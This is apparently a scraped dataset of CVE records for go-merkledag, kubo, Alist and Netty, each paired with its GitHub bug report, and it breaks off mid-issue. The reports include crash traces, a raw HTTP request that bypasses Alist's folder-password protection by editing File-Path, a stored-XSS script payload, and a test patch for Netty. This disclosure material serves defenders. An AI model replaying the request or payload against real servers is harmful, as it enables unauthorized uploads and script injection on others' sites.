CVE-2022-23495 | 2022-12-08T22:15:10.233 | go-merkledag implements the 'DAGService' interface and adds two ipld node types, Protobuf and Raw for the ipfs project. A `ProtoNode` may be modified in such a way as to cause various encode errors which will trigger a panic on common method calls that don't allow for error returns. A `ProtoNode` should only be able to encode to valid DAG-PB, attempting to encode invalid DAG-PB forms will result in an error from the codec. Manipulation of an existing (newly created or decoded) `ProtoNode` using the modifier methods did not account for certain states that would place the `ProtoNode` into an unencodeable form. Due to conformance with the [`github.com/ipfs/go-block-format#Block`](https://pkg.go.dev/github.com/ipfs/go-block-format#Block) and [`github.com/ipfs/go-ipld-format#Node`](https://pkg.go.dev/github.com/ipfs/go-ipld-format#Node) interfaces, certain methods, which internally require a re-encode if state has changed, will panic due to the inability to return an error. This issue has been addressed across a number of pull requests. Users are advised to upgrade to version 0.8.1 for a complete set of fixes. Users unable to upgrade may attempt to mitigate this issue by sanitising inputs when allowing user-input to set a new `CidBuilder` on a `ProtoNode` and by sanitising `Tsize` (`Link#Size`) values such that they are a reasonable byte-size for sub-DAGs where derived from user-input.
| {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "security-advisories@github.com",
"tags": [
"Technical Description",
"Third Party Advisory"
],
"url": "https://en.wikipedia.org/wiki/Directed_acyclic_graph"
},
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/ipfs/go-merkledag/issues/90"
},
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/ipfs/go-merkledag/pull/91"
},
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/ipfs/go-merkledag/pull/92"
},
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/ipfs/go-merkledag/pull/93"
},
{
"source": "security-advisories@github.com",
"tags": [
"Release Notes",
"Third Party Advisory"
],
"url": "https://github.com/ipfs/go-merkledag/releases/tag/v0.8.0"
},
{
"source": "security-advisories@github.com",
"tags": [
"Release Notes",
"Third Party Advisory"
],
"url": "https://github.com/ipfs/go-merkledag/releases/tag/v0.8.1"
},
{
"source": "security-advisories@github.com",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/ipfs/go-merkledag/security/advisories/GHSA-x39j-h85h-3f46"
},
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/ipfs/kubo/issues/9297"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Technical Description",
"Third Party Advisory"
],
"url": "https://en.wikipedia.org/wiki/Directed_acyclic_graph"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/ipfs/go-merkledag/issues/90"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/ipfs/go-merkledag/pull/91"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/ipfs/go-merkledag/pull/92"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/ipfs/go-merkledag/pull/93"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes",
"Third Party Advisory"
],
"url": "https://github.com/ipfs/go-merkledag/releases/tag/v0.8.0"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes",
"Third Party Advisory"
],
"url": "https://github.com/ipfs/go-merkledag/releases/tag/v0.8.1"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/ipfs/go-merkledag/security/advisories/GHSA-x39j-h85h-3f46"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/ipfs/kubo/issues/9297"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:protocol:go-merkledag:*:*:*:*:*:*:*:*",
"matchCriteriaId": "02537CFA-1940-4266-BAB5-D06516862DA8",
"versionEndExcluding": "0.8.1",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "0.4.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"252"
] | 252 | https://github.com/ipfs/go-merkledag/issues/90 | [
"Patch",
"Third Party Advisory"
] | github.com | [
"ipfs",
"go-merkledag"
] | Where this was found: https://github.com/ipfs/kubo/issues/9297
`(*ProtoNode).RawData` use incorrectly panics, there are cases where consumers can because of bad options trigger an error.
My dumb first instict would be to make it return `([]byte, error)` but AFAIT this is trying to fit an interface so we can't do this.
I guess the alternative is to do the serialisation in the write functions (which do return errors) and save the serialised bytes instead. | `(*ProtoNode).RawData` use incorrectly panic instead of returning | https://api.github.com/repos/ipfs/go-merkledag/issues/90/comments | 2 | 2022-09-27T23:28:25Z | 2022-10-04T22:05:41Z | https://github.com/ipfs/go-merkledag/issues/90 | 1,388,507,087 | 90 | 4,488 |
CVE-2022-23495 | 2022-12-08T22:15:10.233 | go-merkledag implements the 'DAGService' interface and adds two ipld node types, Protobuf and Raw for the ipfs project. A `ProtoNode` may be modified in such a way as to cause various encode errors which will trigger a panic on common method calls that don't allow for error returns. A `ProtoNode` should only be able to encode to valid DAG-PB, attempting to encode invalid DAG-PB forms will result in an error from the codec. Manipulation of an existing (newly created or decoded) `ProtoNode` using the modifier methods did not account for certain states that would place the `ProtoNode` into an unencodeable form. Due to conformance with the [`github.com/ipfs/go-block-format#Block`](https://pkg.go.dev/github.com/ipfs/go-block-format#Block) and [`github.com/ipfs/go-ipld-format#Node`](https://pkg.go.dev/github.com/ipfs/go-ipld-format#Node) interfaces, certain methods, which internally require a re-encode if state has changed, will panic due to the inability to return an error. This issue has been addressed across a number of pull requests. Users are advised to upgrade to version 0.8.1 for a complete set of fixes. Users unable to upgrade may attempt to mitigate this issue by sanitising inputs when allowing user-input to set a new `CidBuilder` on a `ProtoNode` and by sanitising `Tsize` (`Link#Size`) values such that they are a reasonable byte-size for sub-DAGs where derived from user-input.
| {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "security-advisories@github.com",
"tags": [
"Technical Description",
"Third Party Advisory"
],
"url": "https://en.wikipedia.org/wiki/Directed_acyclic_graph"
},
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/ipfs/go-merkledag/issues/90"
},
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/ipfs/go-merkledag/pull/91"
},
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/ipfs/go-merkledag/pull/92"
},
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/ipfs/go-merkledag/pull/93"
},
{
"source": "security-advisories@github.com",
"tags": [
"Release Notes",
"Third Party Advisory"
],
"url": "https://github.com/ipfs/go-merkledag/releases/tag/v0.8.0"
},
{
"source": "security-advisories@github.com",
"tags": [
"Release Notes",
"Third Party Advisory"
],
"url": "https://github.com/ipfs/go-merkledag/releases/tag/v0.8.1"
},
{
"source": "security-advisories@github.com",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/ipfs/go-merkledag/security/advisories/GHSA-x39j-h85h-3f46"
},
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/ipfs/kubo/issues/9297"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Technical Description",
"Third Party Advisory"
],
"url": "https://en.wikipedia.org/wiki/Directed_acyclic_graph"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/ipfs/go-merkledag/issues/90"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/ipfs/go-merkledag/pull/91"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/ipfs/go-merkledag/pull/92"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/ipfs/go-merkledag/pull/93"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes",
"Third Party Advisory"
],
"url": "https://github.com/ipfs/go-merkledag/releases/tag/v0.8.0"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes",
"Third Party Advisory"
],
"url": "https://github.com/ipfs/go-merkledag/releases/tag/v0.8.1"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/ipfs/go-merkledag/security/advisories/GHSA-x39j-h85h-3f46"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/ipfs/kubo/issues/9297"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:protocol:go-merkledag:*:*:*:*:*:*:*:*",
"matchCriteriaId": "02537CFA-1940-4266-BAB5-D06516862DA8",
"versionEndExcluding": "0.8.1",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "0.4.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"252"
] | 252 | https://github.com/ipfs/kubo/issues/9297 | [
"Patch",
"Third Party Advisory"
] | github.com | [
"ipfs",
"kubo"
] | ### Checklist
- [X] This is a bug report, not a question. Ask questions on [discuss.ipfs.io](https://discuss.ipfs.io).
- [X] I have searched on the [issue tracker](https://github.com/ipfs/kubo/issues?q=is%3Aissue) for my bug.
- [X] I am running the latest [kubo version](https://dist.ipfs.tech/#kubo) or have an issue updating.
### Installation method
ipfs-update or dist.ipfs.tech
### Version
```Text
Kubo version: 0.15.0
Repo version: 12
System version: amd64/linux
Golang version: go1.18.5
```
### Config
```json
default
```
### Description
Hello! :)
I'm experimenting a bit with more exotic hash functions and `ipfs add`.
For that, I'm adding some ~5MiB binary via `ipfs add --only-hash --cid-version 1 --hash <hash function> <file>`
It's not clear from the documentation which functions are supported, but a quick skim through the source led to [`go-multihash/Names`](https://github.com/multiformats/go-multihash/blob/v0.2.1/multihash.go#L97), and indeed these are accepted by the client (and daemon, I guess).
This all works for normal hash functions (SHA2, SHA3, ...), but behaves weirdly for more exotic ones.
- `poseidon-bls12_381-a2-fc1`, `x11`, `sha2-256-trunc254-padded`, with a running daemon causes `Error: write tcp 127.0.0.1:45460->127.0.0.1:5001: write: connection reset by peer` on the CLI, and the daemon panics:
```
Daemon is ready
panic: unknown multihash code 46081 (0xb401): no such hash registered
goroutine 144031 [running]:
github.com/ipfs/go-merkledag.(*ProtoNode).RawData(...)
github.com/ipfs/go-merkledag@v0.6.0/node.go:229
github.com/ipfs/go-merkledag.(*ProtoNode).Cid(0xc0113c7eb8)
github.com/ipfs/go-merkledag@v0.6.0/node.go:333 +0x245
github.com/ipfs/go-merkledag.(*ProtoNode).String(0xc002ad7b64?)
github.com/ipfs/go-merkledag@v0.6.0/node.go:346 +0x19
github.com/ipfs/go-mfs.NewRoot({0x2a15400, 0xc00d34f920}, {0x2a1b430, 0xc00cf02270}, 0xc0113c7eb8, 0xc00d2c9960?)
github.com/ipfs/go-mfs@v0.2.1/root.go:121 +0x20b
github.com/ipfs/kubo/core/coreapi.(*UnixfsAPI).Add(0xc00a48edc0, {0x2a15358?, 0xc00a658640?}, {0x2a0a120, 0xc00ad21640}, {0xc00a319a40, 0xc, 0x14})
github.com/ipfs/kubo@v0.15.0/core/coreapi/unixfs.go:181 +0x19fd
github.com/ipfs/kubo/core/commands.glob..func6.1()
github.com/ipfs/kubo@v0.15.0/core/commands/add.go:249 +0x110
created by github.com/ipfs/kubo/core/commands.glob..func6
github.com/ipfs/kubo@v0.15.0/core/commands/add.go:246 +0xf1b
```
Trying again then panics the client:
```
panic: unknown multihash code 46081 (0xb401): no such hash registered
goroutine 45 [running]:
github.com/ipfs/go-merkledag.(*ProtoNode).RawData(...)
github.com/ipfs/go-merkledag@v0.6.0/node.go:229
github.com/ipfs/go-merkledag.(*ProtoNode).Cid(0xc000a87eb8)
github.com/ipfs/go-merkledag@v0.6.0/node.go:333 +0x245
github.com/ipfs/go-merkledag.(*ProtoNode).String(0xc001c497b4?)
github.com/ipfs/go-merkledag@v0.6.0/node.go:346 +0x19
github.com/ipfs/go-mfs.NewRoot({0x2a15400, 0xc0002b7650}, {0x2a1b430, 0xc000e2a540}, 0xc000a87eb8, 0xc000e201e0?)
github.com/ipfs/go-mfs@v0.2.1/root.go:121 +0x20b
github.com/ipfs/kubo/core/coreapi.(*UnixfsAPI).Add(0xc000e3c420, {0x2a15358?, 0xc000257a40?}, {0x2a0a120, 0xc000257a00}, {0xc00099a820, 0xc, 0x14})
github.com/ipfs/kubo@v0.15.0/core/coreapi/unixfs.go:181 +0x19fd
github.com/ipfs/kubo/core/commands.glob..func6.1()
github.com/ipfs/kubo@v0.15.0/core/commands/add.go:249 +0x110
created by github.com/ipfs/kubo/core/commands.glob..func6
github.com/ipfs/kubo@v0.15.0/core/commands/add.go:246 +0xf1b
```
- `murmur3-x64-64` and `md5` return `Error: potentially insecure hash functions not allowed`, which is surprising seeing how SHA1 is accepted, maybe. This is mostly fine, but it looks like I'm streaming some of the data to the daemon, it's starting to chunk, and then decides "no, I won't give you the CID".
## Expected Behavior
- Some documentation as to what functions are accepted by `ipfs add`
- Not panicking the daemon | `ipfs add` with exotic hash functions panics (the daemon and the client) | https://api.github.com/repos/ipfs/kubo/issues/9297/comments | 5 | 2022-09-22T10:18:45Z | 2022-09-26T08:05:27Z | https://github.com/ipfs/kubo/issues/9297 | 1,382,201,674 | 9,297 | 4,489 |
CVE-2022-45968 | 2022-12-12T14:15:10.503 | Alist v3.4.0 is vulnerable to File Upload. A user with only file upload permission can upload any file to any folder (even a password protected one). | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/alist-org/alist/issues/2444"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/alist-org/alist/issues/2444"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:alist_project:alist:3.4.0:*:*:*:*:*:*:*",
"matchCriteriaId": "624E7FFC-03C9-4438-9806-46EE810B1141",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"434"
] | 434 | https://github.com/alist-org/alist/issues/2444 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"alist-org",
"alist"
] | ### Please make sure of the following things
- [X] I have read the [documentation](https://alist.nn.ci).
- [X] I'm sure there are no duplicate issues or discussions.
- [X] I'm sure it's due to `alist` and not something else(such as `Dependencies` or `Operational`).
- [X] I'm sure I'm using the latest version
### Alist Version / Alist 版本
v3.4.0
### Driver used / 使用的存储驱动
Local
### Describe the bug / 问题描述
- A user with only file upload permission can upload any file to any folder (even a password protected one)
Reproduction:
- Login as a user who only have the right to upload file
<img width="1512" alt="image" src="https://user-images.githubusercontent.com/52377340/203210424-2c702b35-f8bf-42cb-a534-64d7db497809.png">
- You can see that the /testPasswd folder is password protected
<img width="1512" alt="image" src="https://user-images.githubusercontent.com/52377340/203210827-54440173-6ac4-4437-b313-43dfe1e7a946.png">
- Go to another folder /test (not protected by password), click on file upload to select the uploaded file and grab the package
<img width="1512" alt="image" src="https://user-images.githubusercontent.com/52377340/203211096-3d47b3c8-48b4-4090-9f16-ed22de4ec5c4.png">
<img width="1335" alt="image" src="https://user-images.githubusercontent.com/52377340/203211332-2d5664ca-e61d-4326-8659-b6f4ebf7a5ff.png">

- Modify the File-Path in the packet to the specified directory (take /testPasswd as an example) and send the packet

- Enter the password into the folder to find the file uploaded successfully
<img width="1512" alt="image" src="https://user-images.githubusercontent.com/52377340/203211774-fec62618-9bec-4698-bb5b-c265f2887290.png">
### Reproduction / 复现链接
Package:
PUT /api/fs/put HTTP/1.1
Host: 192.168.31.148:52000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.31.148:52000/test
Authorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6InRlc3QiLCJleHAiOjE2NjkyNTkxMjksIm5iZiI6MTY2OTA4NjMyOSwiaWF0IjoxNjY5MDg2MzI5fQ.h3RncP5nufF43YURW74yQJYbWhnhIO5SqjTFl7UUXk4
Content-Type: application/octet-stream
**File-Path: %2ftestPasswd%2fYZ68QYZdPcaXKdgE3**
As-Task: false
Content-Length: 55875
Origin: http://192.168.31.148:52000
Connection: close
PNG
### Logs / 日志
_No response_ | Upload files to the directory with password Vulnerability(bypass) | https://api.github.com/repos/AlistGo/alist/issues/2444/comments | 1 | 2022-11-22T03:11:58Z | 2022-11-22T08:14:11Z | https://github.com/AlistGo/alist/issues/2444 | 1,458,955,515 | 2,444 | 4,490 |
CVE-2022-45970 | 2022-12-12T14:15:10.557 | Alist v3.5.1 is vulnerable to Cross Site Scripting (XSS) via the bulletin board. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.3,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/alist-org/alist/issues/2457"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/alist-org/alist/issues/2457"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:alist_project:alist:3.5.1:*:*:*:*:*:*:*",
"matchCriteriaId": "E0037D2D-6866-4BCF-8579-9E3A6AB362EA",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/alist-org/alist/issues/2457 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"alist-org",
"alist"
] | ### Please make sure of the following things
- [X] I have read the [documentation](https://alist.nn.ci).
- [X] I'm sure there are no duplicate issues or discussions.
- [X] I'm sure it's due to `alist` and not something else(such as `Dependencies` or `Operational`).
- [X] I'm sure I'm using the latest version
### Alist Version / Alist 版本
v3.5.1
### Driver used / 使用的存储驱动
Local
### Describe the bug / 问题描述
**A storage xss vulnerability exists at the site's bulletin board**
- Enter the malicious xss payload here

- Visit the website homepage, and will find the payload has been executed

### Reproduction / 复现链接
<script>alert(111);</script>
### Logs / 日志
_No response_ | Storage XSS vulnerability | https://api.github.com/repos/AlistGo/alist/issues/2457/comments | 2 | 2022-11-23T03:31:11Z | 2022-11-23T04:30:55Z | https://github.com/AlistGo/alist/issues/2457 | 1,460,931,981 | 2,457 | 4,491 |
CVE-2022-41915 | 2022-12-13T07:15:13.557 | Netty project is an event-driven asynchronous network application framework. Starting in version 4.1.83.Final and prior to 4.1.86.Final, when calling `DefaultHttpHeadesr.set` with an _iterator_ of values, header value validation was not performed, allowing malicious header values in the iterator to perform HTTP Response Splitting. This issue has been patched in version 4.1.86.Final. Integrators can work around the issue by changing the `DefaultHttpHeaders.set(CharSequence, Iterator<?>)` call, into a `remove()` call, and call `add()` in a loop over the iterator of values. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 2.5,
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 2.5,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/netty/netty/commit/fe18adff1c2b333acb135ab779a3b9ba3295a1c4"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/netty/netty/issues/13084"
},
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/netty/netty/pull/12760"
},
{
"source": "security-advisories@github.com",
"tags": [
"Mitigation",
"Third Party Advisory"
],
"url": "https://github.com/netty/netty/security/advisories/GHSA-hh82-3pmq-7frp"
},
{
"source": "security-advisories@github.com",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2023/01/msg00008.html"
},
{
"source": "security-advisories@github.com",
"tags": [
"Third Party Advisory"
],
"url": "https://security.netapp.com/advisory/ntap-20230113-0004/"
},
{
"source": "security-advisories@github.com",
"tags": [
"Third Party Advisory"
],
"url": "https://www.debian.org/security/2023/dsa-5316"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/netty/netty/commit/fe18adff1c2b333acb135ab779a3b9ba3295a1c4"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/netty/netty/issues/13084"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/netty/netty/pull/12760"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mitigation",
"Third Party Advisory"
],
"url": "https://github.com/netty/netty/security/advisories/GHSA-hh82-3pmq-7frp"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2023/01/msg00008.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://security.netapp.com/advisory/ntap-20230113-0004/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://www.debian.org/security/2023/dsa-5316"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:netty:netty:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B032F19E-5D82-4C06-8D4B-AE3810E893B7",
"versionEndExcluding": "4.1.86",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "4.1.83",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*",
"matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:debian:debian_linux:11.0:*:*:*:*:*:*:*",
"matchCriteriaId": "FA6FEEC2-9F11-4643-8827-749718254FED",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"436"
] | 436 | https://github.com/netty/netty/issues/13084 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"netty",
"netty"
] | Advisory: https://github.com/netty/netty/security/advisories/GHSA-hh82-3pmq-7frp
CVE: https://nvd.nist.gov/vuln/detail/CVE-2022-41915
The fix: https://github.com/netty/netty/commit/fe18adff1c2b333acb135ab779a3b9ba3295a1c4
I suspect this to be a regression introduced in https://github.com/netty/netty/pull/12760.
#### Steps to reproduce
Test patch: [netty-cve-2022-41915-test.patch](https://github.com/netty/netty/files/10311197/netty-cve-2022-41915-test.patch)
Confirming 4.1.83 is affected:
```sh
❯ git restore .
❯ git checkout tags/netty-4.1.83.Final
❯ mvn -Dtest=DefaultHttpHeaders* test -f codec-http/pom.xml
...
[INFO] Tests run: 22, Failures: 0, Errors: 0, Skipped: 0
[INFO] BUILD SUCCESS
# Applying the patch:
❯ curl -sL https://github.com/netty/netty/files/10311197/netty-cve-2022-41915-test.patch | git apply -C1 -
❯ git status -s
M codec-http/src/test/java/io/netty/handler/codec/http/DefaultHttpHeadersTest.java
❯ mvn -Dtest=DefaultHttpHeaders* test -f codec-http/pom.xml
# ...
[ERROR] Failures:
[ERROR] DefaultHttpHeadersTest.setIterableValidatesValue:253 Expected java.lang.IllegalArgumentException to be thrown, but nothing was thrown.
[INFO]
[ERROR] Tests run: 24, Failures: 1, Errors: 0, Skipped: 0
```
Confirming 4.1.82 is not affected:
```sh
❯ git checkout tags/netty-4.1.82.Final
